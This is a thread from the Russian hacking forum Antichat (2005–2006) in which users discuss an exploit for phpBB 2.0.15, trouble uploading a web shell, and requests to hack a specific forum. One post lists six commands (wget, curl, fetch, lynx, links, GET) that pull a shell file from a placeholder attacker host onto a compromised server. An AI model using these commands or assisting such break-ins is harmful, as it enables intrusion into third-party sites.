ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Эксплоит для phpbb 2.0.15 (https://forum.antichat.xyz/showthread.php?t=7529)

SanyaX 04.07.2005 18:41

Не понял что получилось?

DR@G 04.07.2005 19:32

Форум хакнуть =))
Скинь нам видео с SK | Heaton'om на вебфайл и скажи пасс от него =))

SK | Heaton 05.07.2005 07:28

Цитата:

Сообщение от DR@G
Форум хакнуть =))
Скинь нам видео с SK | Heaton'om на вебфайл и скажи пасс от него =))

я уже вчера получил и просмотрел =)) у него почти получилось. Просто он не смог залить шелл.. Ну это уже кому как повезет с жертвой =))

m0nzt3r 05.07.2005 13:18

слушайте а нах вам шелл заливать?кто качал последний выпуск езина от Мазы тот знает что там лежит измененный сплойт для пхпбб 2.0.15 и очень отлично работает и прост в управлении..

uboHEX 06.07.2005 02:04

Народ, хоть тресни не могу понять как скачать или залить файл с\на сервер. Не могу составить запрос wget`ом. Помогите плиз.

mamont 06.07.2005 02:40

хм я ощущаю себя маленькой собачкой которой показали вкусный кусок мяса а потом подвесили на прилачно расстоянии да так что мне до него не подпрыгнуть !!!=(

Вот сижу облизываюсь и хочу всех убить !!!!!!!!!!

SK | Heaton 06.07.2005 08:17

mamont, но но !!!

KLez 06.07.2005 10:54

2 mamont Ну что ты не понимаешь ТО??? Тебе дали сплоит вот и юзай .

mamont 07.07.2005 01:58

вопервых я не могу создать для него среду по некоторым приченам =(
а биплатного шела вот неделю не могу найти чбы wget хотябы работал =(

может кто подскажет сайтик где халява на шелл ????

ProTeuS 07.07.2005 02:27

дааа, с wget'ом траблемка-то вышла...у меня тоже не заработал :(

t4k 07.07.2005 03:52

Так может там просто не wget стоит, а например feetch или curl? :)

Xalegi 07.07.2005 10:31

верняк... сначала посмотрите какая качалка стоит.. потом права куда скачиваете.. и всё тип-топ =)

tester2005 08.07.2005 03:53

Млииин ну вы даете, трудно почитать книжек, мануалов чтоль.......
Вот споссобы закачек, еси один не работает то заработает другой

метод wget:
wget http://attacker/shellfile -o /папка

метод fetch:
fetch -p http://attacker/shellfile -o /папка

метод lynx:
lynx -source http://attacker/shellfile > /папка

метод links:
links -source http://attacker/shellfile > /папка

метод curl:
curl http://attacker/shellfile -o /папка

метод GET:
GET http://attacker/shellfile > /папка

ph0en1x 01.07.2006 06:34

Перепробовал все описаные способы нифига не получилось. :( может просто руки кривые.
Помогите взломать http://в просьбы о взломах/forum/.

Voyageur 01.07.2006 11:11

ph0en1x, если судить по тесту на определение версии, то форум принадлежит к 2.0.19, а не 2.0.15. Тогда тебе в поиск, там был эксплоит, правда он даалееекоо не везде работает.
ЗЫ Если удастся взломать его - дай мне знать, сколько не бьюсь над 19-м - нифига не получается :(

bandera 01.07.2006 13:41

Цитата:

Сообщение от Voyageur
Если удастся взломать его - дай мне знать, сколько не бьюсь над 19-м - нифига не получается :(

А чо над ним биться то, всё равно ничего не получится. Ну только если у тебя есть логин и пасс админа или на форуме стоит мод смены стиля форума с главной страницы.

Есть два сплойта к 19.
Один: для выполнения команд если имеем логин и пасс админа.
Второй (наверное тот который ты имел ввиду): реализовать уязвимость можно только на форумах где стоит мод смены стиля форума с главной страницы (таких не очень много).

Voyageur 01.07.2006 18:36

bandera, ну это я знаю. Там же вроде xss была? Не бывает такого, что взломать нельзя. Особенно у phpBB :)


Время: 15:29